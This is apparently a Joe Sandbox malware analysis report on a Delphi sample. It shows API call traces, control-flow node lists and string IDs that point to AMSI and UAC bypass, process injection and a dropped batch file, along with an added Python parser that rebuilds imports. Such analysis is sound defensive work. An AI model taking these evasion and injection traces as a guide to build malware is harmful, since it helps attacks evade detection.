                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC4D
                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1568E9E1), ref: 1569CC5E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC61
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1568E9E1), ref: 1569CC72
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC75
                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1568E9E1), ref: 1569CC83
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC86
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,1568E9E1), ref: 1569CC97
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CC9A
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,1568E9E1), ref: 1569CCA7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCAA
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,1568E9E1), ref: 1569CCB7
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCBA
                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,1568E9E1), ref: 1569CCCC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCCF
                                                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,1568E9E1), ref: 1569CCDC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCDF
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,1568E9E1), ref: 1569CCF0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CCF3
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,1568E9E1), ref: 1569CD04
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD07
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,1568E9E1), ref: 1569CD19
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD1C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,1568E9E1), ref: 1569CD29
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD2C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,1568E9E1), ref: 1569CD39
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD3C
                                                                                                                                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,1568E9E1), ref: 1569CD49
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569CD4C
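The list above shows the second module resolving its imports at run time: every LoadLibraryA or GetModuleHandleA call is immediately followed by a GetProcAddress whose only visible argument is 00000000, and the export name survives only as the second stack argument the sandbox captured on the preceding line (an 8-digit hex value such as 0000000C for Shlwapi is how an ordinal lookup appears). The 02DF7BE8 subcall in the previous function's APIs (LoadLibraryW/GetModuleHandleW/GetProcAddress) is the same pattern. The following is an added example, not code from the sample or from Joe Sandbox: a parser that rebuilds the (DLL, export) pairs from lines in this report format by pairing each module-handle call with the next GetProcAddress in ref-address order. The input lines are a subset copied from the list above; the regex assumes the report's '• Func.MODULE(args), ref: ADDR' layout.

```python
"""Rebuild the dynamically resolved import list from Joe Sandbox 'APIs' lines.

Added example; not code from the analysed sample or from the Joe Sandbox report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Sample input: lines copied from the report's second APIs block, chosen to
# include a GetModuleHandleA case and the ordinal case (Shlwapi, 0000000C).
SAMPLE = """
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB65
• GetProcAddress.KERNEL32(00000000), ref: 1569CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1568E9E1), ref: 1569CB85
• GetProcAddress.KERNEL32(00000000), ref: 1569CB88
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1568E9E1), ref: 1569CBC3
• GetProcAddress.KERNEL32(00000000), ref: 1569CBC6
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1568E9E1), ref: 1569CC83
• GetProcAddress.KERNEL32(00000000), ref: 1569CC86
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,1568E9E1), ref: 1569CD19
• GetProcAddress.KERNEL32(00000000), ref: 1569CD1C
"""

# '• Func.MODULE(arg,arg,...), ref: ADDR' as rendered by the report
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class Resolved:
    dll: str
    export: str   # export name, or "#<n>" for an ordinal lookup
    loader: str   # API that produced the module handle
    ref: int      # address of the GetProcAddress call


def parse_api_lines(text):
    """Yield (ref, func, args) for every line that matches the report layout, sorted by ref."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((int(m["ref"], 16), m["func"], m["args"].split(",")))
    events.sort(key=lambda e: e[0])
    return events


def reconstruct_imports(text):
    """Pair each module-handle call with the GetProcAddress that follows it."""
    resolved = []
    pending = None
    for ref, func, args in parse_api_lines(text):
        if func in LOADERS and len(args) >= 2:
            dll, sym = args[0], args[1]
            # The second stack argument is whatever the sandbox saw at call time,
            # normally the name the caller is about to pass to GetProcAddress.
            # An 8-hex-digit value is MAKEINTRESOURCE(n): lookup by ordinal,
            # which leaves no string to search the binary for.
            if HEX8.match(sym):
                sym = "#%d" % int(sym, 16)
            pending = (dll, sym, func)
        elif func == "GetProcAddress" and pending is not None:
            resolved.append(Resolved(pending[0], pending[1], pending[2], ref))
            pending = None
    return resolved


def group_by_dll(resolved):
    """Map lower-cased DLL name to the list of exports resolved from it, in call order."""
    out = defaultdict(list)
    for r in resolved:
        out[r.dll.lower()].append(r.export)
    return dict(out)


if __name__ == "__main__":
    for dll, exports in group_by_dll(reconstruct_imports(SAMPLE)).items():
        print(dll, exports)
```

The captured stack argument is a hint rather than proof of the name requested: in the Psapi/Kernel32 pair it is the same string for both module handles, which is consistent with a fallback lookup but is not shown by the report. Ordinal imports come out as "#12" and similar, a reminder that a string search of the dump for those exports will find nothing.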
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                    • API String ID: 4236061018-3687161714
                                                                                                                                                    • Opcode ID: 721de2ec1eeb828821f7a60f870770a7d1e1c76e06971d17fcc60401dd5bd8b3
                                                                                                                                                    • Instruction ID: bab711684539250f4f4e96354ac4344f1b77650b951ea60933c19b96144f3b89
                                                                                                                                                    • Opcode Fuzzy Hash: 721de2ec1eeb828821f7a60f870770a7d1e1c76e06971d17fcc60401dd5bd8b3
                                                                                                                                                    • Instruction Fuzzy Hash: 574186B0C1336C6AEB10EBB6CCADD5B3EACE9856953410A1BF514A7509DE399800CFF4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

Control-flow graph node list for 2e05fa0 .. 2e08b96 (the rendered graph with its Executed / Not Executed colouring is not preserved, and the dump is cut off at the end of the page). Structure recoverable from the node list:
• Blocks 2e05fa0-2e0618a, 2e06190-2e0638f, 2e06395-2e069b4, 2e06b54-2e06cd7 and 2e074a8-2e08b96 consist almost entirely of repetitions of the call group 2de4824, 2de4964, 2de4698, 2de47b0, 2de4964, 2de4698, 2df7be8, interleaved with runs of 2de4698 * 2 followed by 2df7be8 and one run of 2df7be8 * 16.
• The only direct API call in the listed blocks is GetCurrentProcess in 2e06395-2e069b4 (followed by call 2df7968); 2de2ee0 and 2de2f08 appear once in the same block, and 2de48b0 closes blocks 2e06190-2e0638f and 2e06b54-2e06cd7.
• Edges: 4527 -> 4582 and 4527 -> 4583 (2e0618b: a single call 2df7be8 that rejoins 4582); 4582 -> 4642 and 4582 -> 4643; the edges of block 4732 (2e074a8-2e08b96) are cut off.
2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 ExitProcess 4642->4732 4733 2e06cdd-2e06cec call 2de48b0 4642->4733 5169 2e069b6-2e069b9 4643->5169 5170 2e069bb-2e06b4f call 2de49bc call 2dfc5bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 EnumSystemLocalesA 4643->5170 4733->4732 4741 2e06cf2-2e06fc5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7e18 4733->4741 4984 2e072a2-2e074a3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc call 2df7f48 4741->4984 4985 2e06fcb-2e0729d call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 
2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 4741->4985 4984->4732 4985->4984 5169->5170 5170->4642
APIs
  • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
  • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
  • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
  • Part of subcall function 02DE2EE0: QueryPerformanceCounter.KERNEL32 ref: 02DE2EE4
• GetCurrentProcess.KERNEL32(00000000,17D78400,00001000,00000040,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC), ref: 02E0681D
  • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
  • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
  • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
• EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(15680000,00000000,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344), ref: 02E06B4F
  • Part of subcall function 02DE7E18: GetFileAttributesA.KERNEL32(00000000,?,02DFE0EE,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,UacInitialize), ref: 02DE7E23
  • Part of subcall function 02DFC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
  • Part of subcall function 02DFC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
  • Part of subcall function 02DFC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
  • Part of subcall function 02DFC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
• ExitProcess.KERNEL32(00000000,ScanBuffer,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,Initialize,02E45344,02E08FEC,ScanString,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E08B96
  • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
  • Part of subcall function 02DE4C3C: SysFreeString.OLEAUT32 ref: 02DE4C4F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$AddressFreeHandleModulePathProcProcessString$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
• String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 3496465935-2845693168
• Opcode ID: 3ef9badc991d898c63df0b1ad411a46819e80b93ba120080903716f45bbd5a8f
• Instruction ID: a53a62a5c624b0a165ce48016118036ee0eac0cf1cb3e9e9506ca5cc0694929c
• Opcode Fuzzy Hash: 3ef9badc991d898c63df0b1ad411a46819e80b93ba120080903716f45bbd5a8f
• Instruction Fuzzy Hash: 3343E934A802588BDF10FB65DC809CE73BAEB85700F5095E5E50AEB355DA30AEC6CF65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AAC
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5ACA
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DE5B06
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DE5B4F
• RegQueryValueExA.ADVAPI32(?,02DE5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001), ref: 02DE5B6D
• RegCloseKey.ADVAPI32(?,02DE5B9C,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DE5B8F
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DE5BAC
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DE5BB9
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DE5BBF
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DE5BEA
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C31
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C41
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C69
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C79
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DE5C9F
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DE5CAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460
• Opcode ID: ec5d89d4912812189356c790528620c4806d11a0e475ed81ff2239e964fb9192
• Instruction ID: ad5d80da37db66032d3cdc3c23ff950e736bd032dd766c40bbbc896b53a209d7
• Opcode Fuzzy Hash: ec5d89d4912812189356c790528620c4806d11a0e475ed81ff2239e964fb9192
• Instruction Fuzzy Hash: 38514271B4020D7AFF21E6A4DC46FEE77ADDB04788F8041A1A606E6281E674DE84CF64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
  • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
  • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
  • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02E45644,02E45688,ScanString,02E45344,02DFD0A4,OpenSession,02E45344), ref: 02DFCDD3
• WaitForSingleObject.KERNEL32(0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,UacScan,02E45344), ref: 02DFD01F
• CloseHandle.KERNEL32(0000088C,0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,UacScan), ref: 02DFD02A
• CloseHandle.KERNEL32(00000570,0000088C,0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4), ref: 02DFD035
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
• String ID: *"C:\Users\Public\Libraries\CmzcxhwnO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                    • API String ID: 1205125484-3218151172
                                                                                                                                                    • Opcode ID: c1375414d8ecac194610ae1daf1d22dfd01eeb8bd5eaf14792647475bab56f7e
                                                                                                                                                    • Instruction ID: 26412745242cf0ec6bf33a736fe851e3c5f8e14177579cc235354a3233a21d89
                                                                                                                                                    • Opcode Fuzzy Hash: c1375414d8ecac194610ae1daf1d22dfd01eeb8bd5eaf14792647475bab56f7e
                                                                                                                                                    • Instruction Fuzzy Hash: 17F1FD34A001589FDF50FBA4D881FDEB3B7EF45700F6180A5A20ABB754DA70AD468F65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
Strings
• NtAllocateVirtualMemory, xrefs: 02DF796B
• C:\Windows\System32\ntdll.dll, xrefs: 02DF7970
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 33e070c9a4162fb7a22df2c6bae969cb3d52cd90258176d73fe70390266604f5
• Instruction ID: a6a435167c4529aa7e5d3a201c43e37f095abaa5d9c89159dbbccfad2d89a49f
• Opcode Fuzzy Hash: 33e070c9a4162fb7a22df2c6bae969cb3d52cd90258176d73fe70390266604f5
• Instruction Fuzzy Hash: 20E01AB669020CBFEB40EEA8EC41EDA77ECEB18610F404415BA09D7200D770ED608BB9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
Strings
• NtAllocateVirtualMemory, xrefs: 02DF796B
• C:\Windows\System32\ntdll.dll, xrefs: 02DF7970
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 1353de4a7838454451c653b723df8559b83b5071f23f6410f6fac6f5dfea5503
• Instruction ID: 69c0d2a02a2bcfef1f18fb37a7382509118e0f3ad02288280c7fceb6948885a8
• Opcode Fuzzy Hash: 1353de4a7838454451c653b723df8559b83b5071f23f6410f6fac6f5dfea5503
• Instruction Fuzzy Hash: 80E01AB659020CBFEB40EEA8E841ECA77ECEB18610F404405BA09D7200D770E9608BB9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC517
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC547
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DFC55C
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DFC588
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DFC591
  • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
